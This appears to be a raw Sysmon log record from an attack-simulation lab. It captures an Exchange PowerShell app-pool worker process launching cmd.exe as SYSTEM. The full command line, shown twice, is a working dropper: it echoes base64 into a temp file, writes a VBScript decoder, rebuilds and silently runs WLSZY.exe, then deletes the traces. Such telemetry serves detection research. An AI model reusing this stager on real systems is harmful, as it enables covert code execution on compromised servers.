AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\OfpmF.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\OSyGE.vbs & echo Set file = fs.GetFile("%TEMP%\OfpmF.b64") >>%TEMP%\OSyGE.vbs & echo If file.Size Then >>%TEMP%\OSyGE.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\OfpmF.b64", 1) >>%TEMP%\OSyGE.vbs & echo data = fd.ReadAll >>%TEMP%\OSyGE.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\OSyGE.vbs & echo data = base64_decode(data) >>%TEMP%\OSyGE.vbs & echo fd.Close >>%TEMP%\OSyGE.vbs & echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\WLSZY.exe", 2, True) >>%TEMP%\OSyGE.vbs & echo ofs.Write data >>%TEMP%\OSyGE.vbs & echo ofs.close >>%TEMP%\OSyGE.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\OSyGE.vbs & echo shell.run "%TEMP%\WLSZY.exe", 0, false >>%TEMP%\OSyGE.vbs & echo Else >>%TEMP%\OSyGE.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\OSyGE.vbs & echo End If >>%TEMP%\OSyGE.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\OSyGE.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\OSyGE.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\OSyGE.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\OSyGE.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\OSyGE.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\OSyGE.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\OSyGE.vbs & echo If Not w2 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\OSyGE.vbs & echo If Not w3 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\OSyGE.vbs & echo If Not w4 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\OSyGE.vbs & echo Next >>%TEMP%\OSyGE.vbs & echo base64_decode = strOut >>%TEMP%\OSyGE.vbs & echo End Function >>%TEMP%\OSyGE.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\OSyGE.vbs & echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\OSyGE.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\OSyGE.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\OSyGE.vbs & echo Else >>%TEMP%\OSyGE.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\OSyGE.vbs & echo End If >>%TEMP%\OSyGE.vbs & echo End Function >>%TEMP%\OSyGE.vbs & cscript //nologo %TEMP%\OSyGE.vbs & del %TEMP%\OSyGE.vbs & del %TEMP%\OfpmF.b64NT AUTHORITY\SYSTEM 154100x8000000000000000112200044Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 13:34:28.098{0BBB6F36-7E64-637B-666B-010000009902}19192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%%TEMP%%\OfpmF.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%%TEMP%%\OSyGE.vbs & echo Set file = fs.GetFile("%%TEMP%%\OfpmF.b64") >>%%TEMP%%\OSyGE.vbs & echo If file.Size Then >>%%TEMP%%\OSyGE.vbs & echo Set fd = fs.OpenTextFile("%%TEMP%%\OfpmF.b64", 1) >>%%TEMP%%\OSyGE.vbs & echo data = fd.ReadAll >>%%TEMP%%\OSyGE.vbs & echo data = Replace(data, vbCrLf, "") >>%%TEMP%%\OSyGE.vbs & echo data = base64_decode(data) >>%%TEMP%%\OSyGE.vbs & echo fd.Close >>%%TEMP%%\OSyGE.vbs & echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%%TEMP%%\WLSZY.exe", 2, True) >>%%TEMP%%\OSyGE.vbs & echo ofs.Write data >>%%TEMP%%\OSyGE.vbs & echo ofs.close >>%%TEMP%%\OSyGE.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%%TEMP%%\OSyGE.vbs & echo shell.run "%%TEMP%%\WLSZY.exe", 0, false >>%%TEMP%%\OSyGE.vbs & echo Else >>%%TEMP%%\OSyGE.vbs & echo Wscript.Echo "The file is empty." >>%%TEMP%%\OSyGE.vbs & echo End If >>%%TEMP%%\OSyGE.vbs & echo Function base64_decode(byVal strIn) >>%%TEMP%%\OSyGE.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%%TEMP%%\OSyGE.vbs & echo For n = 1 To Len(strIn) Step 4 >>%%TEMP%%\OSyGE.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%%TEMP%%\OSyGE.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%%TEMP%%\OSyGE.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%%TEMP%%\OSyGE.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%%TEMP%%\OSyGE.vbs & echo If Not w2 Then _ >>%%TEMP%%\OSyGE.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%%TEMP%%\OSyGE.vbs & echo If Not w3 Then _ >>%%TEMP%%\OSyGE.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%%TEMP%%\OSyGE.vbs & echo If Not w4 Then _ >>%%TEMP%%\OSyGE.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%%TEMP%%\OSyGE.vbs & echo Next >>%%TEMP%%\OSyGE.vbs & echo base64_decode = strOut >>%%TEMP%%\OSyGE.vbs & echo End Function >>%%TEMP%%\OSyGE.vbs & echo Function mimedecode(byVal strIn) >>%%TEMP%%\OSyGE.vbs & echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%%TEMP%%\OSyGE.vbs & echo If Len(strIn) = 0 Then >>%%TEMP%%\OSyGE.vbs & echo mimedecode = -1 : Exit Function >>%%TEMP%%\OSyGE.vbs & echo Else >>%%TEMP%%\OSyGE.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%%TEMP%%\OSyGE.vbs & echo End If >>%%TEMP%%\OSyGE.vbs & echo End Function >>%%TEMP%%\OSyGE.vbs & cscript //nologo %%TEMP%%\OSyGE.vbs & del %%TEMP%%\OSyGE.vbs & del %%TEMP%%\OfpmF.b64c:\windows\system32\inetsrv\NT AUTHORITY\SYSTEM{0BBB6F36-3640-6378-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{0BBB6F36-3E6E-6378-D612-000000009902}18312C:\Windows\System32\inetsrv\w3wp.exec:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangePowerShellAppPool" -v "v4.0" -c "C:\Program Files\Microsoft\Exchange Server\V15\bin\GenericAppPoolConfigWithGCServerEnabledFalse.config" -a \\.\pipe\iisipm256cfd27-a9a7-47bb-8a5b-085d96a1edfe -h "C:\inetpub\temp\apppools\MSExchangePowerShellAppPool\MSExchangePowerShellAppPool.config" -w "" -m 0NT AUTHORITY\SYSTEM